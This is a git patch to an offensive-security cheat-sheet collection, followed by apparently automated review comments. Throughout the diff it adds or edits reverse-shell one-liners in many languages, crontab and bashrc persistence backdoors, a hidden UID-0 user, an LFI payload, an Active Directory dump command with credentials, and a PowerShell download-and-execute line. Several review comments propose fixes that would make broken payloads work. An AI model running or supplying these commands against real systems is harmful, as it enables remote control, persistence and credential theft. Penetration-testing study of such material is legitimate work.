From 9be62677b683bc06d80e34f13351d32e98469c8f Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 24 Jun 2019 00:21:39 +0200 Subject: [PATCH] Add root user + PHP null byte version --- File Inclusion/README.md | 3 ++ GraphQL Injection/README.md | 4 ++- .../Active Directory Attack.md | 10 +++++- .../Linux - Persistence.md | 31 +++++++++++++++-- .../Reverse Shell Cheatsheet.md | 33 ++++++++++++------- .../Windows - Privilege Escalation.md | 8 ++--- Server Side Request Forgery/README.md | 4 ++- 7 files changed, 72 insertions(+), 21 deletions(-) diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 924241b..c9049a1 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -33,6 +33,7 @@ * [Kadimus - https://github.com/P0cL4bs/Kadimus](https://github.com/P0cL4bs/Kadimus) * [LFISuite - https://github.com/D35m0nd142/LFISuite](https://github.com/D35m0nd142/LFISuite) +* [fimap - https://github.com/kurobeats/fimap](https://github.com/kurobeats/fimap) ## Basic LFI @@ -44,6 +45,8 @@ http://example.com/index.php?page=../../../etc/passwd ### Null byte +:warning: In versions of PHP below 5.3 we can terminate with null byte. + ```powershell http://example.com/index.php?page=../../../etc/passwd%00 ``` diff --git a/GraphQL Injection/README.md b/GraphQL Injection/README.md index e015274..04464d4 100644 --- a/GraphQL Injection/README.md +++ b/GraphQL Injection/README.md 
@@ -211,4 +211,6 @@ curl -X POST http://localhost:8080/graphql\?embedded_submission_form_uuid\=1%27% * [GraphQL NoSQL Injection Through JSON Types - June 12, 2017 - Pete Corey](http://www.petecorey.com/blog/2017/06/12/graphql-nosql-injection-through-json-types/) * [SQL injection in GraphQL endpoint through embedded_submission_form_uuid parameter - Nov 6th 2018 - @jobert](https://hackerone.com/reports/435066) * [Looting GraphQL Endpoints for Fun and Profit - @theRaz0r](https://raz0r.name/articles/looting-graphql-endpoints-for-fun-and-profit/) -* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) \ No newline at end of file +* [How to set up a GraphQL Server using Node.js, Express & MongoDB - 5 NOVEMBER 2018 - Leonardo Maldonado](https://www.freecodecamp.org/news/how-to-set-up-a-graphql-server-using-node-js-express-mongodb-52421b73f474/) +* [GraphQL cheatsheet - DEVHINTS.IO](https://devhints.io/graphql) +* [HIP19 Writeup - Meet Your Doctor 1,2,3 - June 22, 2019 - Swissky](https://swisskyrepo.github.io/HIP19-MeetYourDoctor/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 3eb8800..7c6bb5c 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -318,6 +318,11 @@ UserPassword, UnixUserPassword, unicodePwd and msSFU30Password. Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID ``` +or dump the Active Directory and `grep` the content. + +```powershell +ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/ +``` ### PassTheTicket Golden Tickets 
@@ -581,6 +586,8 @@ Alternatively you can use the Metasploit module Password spraying refers to the attack method that takes a large number of usernames and loops them with a single password. +> The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates. + Using `kerbrute`, a tool to perform Kerberos pre-auth bruteforcing. ```powershell @@ -645,4 +652,5 @@ Most of the time the best passwords to spray are : * [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) * [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) * [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) -* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) \ No newline at end of file +* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) +* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index f39abf5..45ec556 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md 
@@ -1,5 +1,21 @@ # Linux - Persistence +## Summary + +* [Basic reverse shell](#basic-reverse-shell) +* [Add a root user](#add-a-root-user) +* [Suid Binary](#suid-binary) +* [Crontab - Reverse shell](#crontab-reverse-shell) +* [Backdooring a user's bash_rc](#backdooring-an-users-bash-rc) +* [Backdooring a startup service](#backdoor-a-startup-service) +* [Backdooring a user startup file](#backdooring-an-user-startup-file) +* [Backdooring a driver](#backdooring-a-driver) +* [Backdooring the APT](#backdooring-the-apt) +* [Backdooring the SSH](#backdooring-the-ssh) +* [Tips](#tips) +* [References](#references) + + ## Basic reverse shell ```bash @@ -8,6 +24,13 @@ ncat --sctp -lvp 4242 ncat --tcp -lvp 4242 ``` +## Add a root user + +```powershell +sudo useradd -ou 0 -g 0 john +sudo passwd john +``` + ## Suid Binary ```powershell @@ -19,13 +42,15 @@ chown root:root $TMPDIR2/croissant chmod 4777 $TMPDIR2/croissant ``` -## Crontab (Reverse shell to 192.168.1.2 on port 4242) +## Crontab - Reverse shell ```bash (crontab -l ; echo "@reboot sleep 200 && ncat 192.168.1.2 4242 -e /bin/bash")|crontab 2> /dev/null ``` -## Backdooring an user's bash_rc (FR/EN Version) +## Backdooring a user's bash_rc + +(FR/EN Version) ```bash TMPNAME2=".systemd-private-b21245afee3b3274d4b2e2-systemd-timesyncd.service-IgCBE0" @@ -48,7 +73,7 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart ``` -## Backdooring an user startup file +## Backdooring a user startup file Linux, write a file in `~/.config/autostart/NAME_OF_FILE.desktop` diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index 368f68a..e08aff0 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md 
@@ -5,6 +5,7 @@ * [Reverse Shell](#reverse-shell) * [Bash TCP](#bash-tcp) * [Bash UDP](#bash-udp) + * [Socat](#socat) * [Perl](#perl) * [Python](#python) * [PHP](#php) @@ -50,6 +51,15 @@ Listener: nc -u -lvp 4242 ``` +### Socat + +```powershell +user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 +user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242 +``` + +Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat) + ### Perl ```perl @@ -118,12 +128,13 @@ echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp"," ```bash nc -e /bin/sh [IPADDR] [PORT] +nc.traditional -e /bin/bash 10.0.0.1 4444 ``` ### Netcat OpenBsd ```bash -rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f +rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f ``` ### Ncat 
@@ -147,11 +158,11 @@ user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet ### Powershell ```powershell -powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ```powershell -powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" +powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName 
System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` ```powershell @@ -161,21 +172,21 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse ### Awk ```powershell -awk 'BEGIN {s = "/inet/tcp/0//"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null +awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null ``` ### Java ```java r = Runtime.getRuntime() -p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) +p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ### War ```java -msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war +msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war strings reverse.war | grep jsp # in order to get the name of the file ``` 
@@ -185,13 +196,13 @@ strings reverse.war | grep jsp # in order to get the name of the file Linux only ```powershell -lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" +lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');" ``` Windows and Linux ```powershell -lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' +lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' ``` ### NodeJS @@ -202,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") cp = require("child_process"), sh = cp.spawn("/bin/sh", []); var client = new net.Socket(); - client.connect(8080, "10.17.26.64", function(){ + client.connect(4242, "10.0.0.1", function(){ client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client); @@ -213,12 +224,12 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") or -require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') +require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242') or -var x = global.process.mainModule.require --x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') +-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash') or 
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 5c3cfde..83de0f5 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -23,6 +23,10 @@ ## Tools +- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) + ```powershell + powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks + ``` - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) ```powershell @@ -43,10 +47,6 @@ ```powershell powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt ``` -- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) - ```powershell - powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks - ``` ## Windows Version and Configuration diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index b2726c1..70bb50c 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -114,6 +114,7 @@ http://0000::1:3128/ Squid ### Bypass localhost with a domain redirection ```powershell +http://spoofed.burpcollaborator.net http://localtest.me http://customer1.app.localhost.my.company.127.0.0.1.nip.io http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost 
@@ -628,4 +629,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) -- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) \ No newline at end of file +- [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) +- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) \ No newline at end of file
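Review bot: the version boundary in the new ":warning:" line of File Inclusion/README.md is imprecise. Null-byte truncation of filesystem paths was removed in PHP 5.3.4 (paths containing a NUL byte are rejected from that release on), so "In versions of PHP below 5.3" should read "below 5.3.4"; readers auditing a 5.3.0 to 5.3.3 install would otherwise conclude they are not affected.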
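Review bot: the appended reference in GraphQL Injection/README.md still leaves the file without a trailing newline (the "+" side carries its own "\ No newline at end of file"), so the next appended entry will again show the previous last line as deleted and re-added. Add the newline now; the same applies to the reference lists touched in Active Directory Attack.md and Server Side Request Forgery/README.md.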
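Review bot: the sentence "or dump the Active Directory and `grep` the content" introduces ldapdomaindump without a link to the tool, unlike the other tools in this file, and the example's `DOMAIN\john`, `MyP@ssW0rd` and `10.10.10.10` are not marked as placeholders. Add the tool's repository link and a short comment stating that user, password and host are examples to be replaced.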
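Review bot: the added blockquote about the builtin Administrator account (RID:500) is an unattributed quotation; its source, the Morgan Simonsen article, is only added to the reference list at the end of the file, far from the Password Spraying section. Put the link next to the quote (or name the source inline) so the reader can verify the claim where it is made.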
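Review bot: several anchors in the new Summary of Linux - Persistence.md do not match the headings as renamed in the same patch. "Backdooring a user's bash_rc" yields the GitHub anchor `#backdooring-a-users-bash_rc`, not `#backdooring-an-users-bash-rc`; "Backdooring a user startup file" yields `#backdooring-a-user-startup-file`, not `#backdooring-an-user-startup-file`; and "Crontab - Reverse shell" yields `#crontab---reverse-shell` (the hyphen is kept and each space becomes one), not `#crontab-reverse-shell`. `#backdoor-a-startup-service` should also be checked against its heading, which is outside the diff context. Separately, the new "Add a root user" block is shell, so tag its fence ```bash like the neighbouring "Basic reverse shell" block rather than ```powershell.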
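Review bot: the rewritten first PowerShell one-liner still calls `$client.GetStream()` without ever assigning `$client`; the `New-Object System.Net.Sockets.TCPClient(...)` result is discarded, so the line fails at the first `$client` reference. The second variant in the same hunk has the `$client = ` assignment and is the correct form; make the first one match while its address is being edited.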
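Review bot: the updated Awk line has a stray `>` inside the gawk special-file path (`/inet/tcp/0/10.0.0.1>/4242`). gawk's format is `/inet/tcp/lport/rhost/rport`, so the `>` makes the host component invalid; drop it so the path matches the `10.0.0.1` / `4242` convention used elsewhere in this patch.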
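Review bot: the port standardization in Reverse Shell Cheatsheet.md is inconsistent. Most entries are moved to `10.0.0.1:4242`, but the new `nc.traditional` line and the Netcat OpenBsd line use `4444`, and the second Lua line changes the host to `10.0.0.1` while keeping `4444`. Pick one port for the whole file so readers can swap a single value.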
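Review bot: the PowerUp entry is moved to the head of the Tools list in Windows - Privilege Escalation.md without a change of content, but its link text points at `PowerShellMafia/PowerSploit` while the `DownloadString` URL fetches `PowerUp.ps1` from `PowerShellEmpire/PowerTools`. Since the lines are being touched anyway, make the link and the URL refer to the same project. The commit message also does not mention this reorder.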
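Review bot: the added `http://spoofed.burpcollaborator.net` line in the "Bypass localhost with a domain redirection" list is the only entry with no note on what it resolves to, whereas the neighbouring `http://mail.ebc.apple.com redirect to 127.0.0.6 == localhost` explains itself. Mark it as a placeholder for a name under the tester's own control, in the same trailing-comment style, so it is not read as a public host that resolves to localhost.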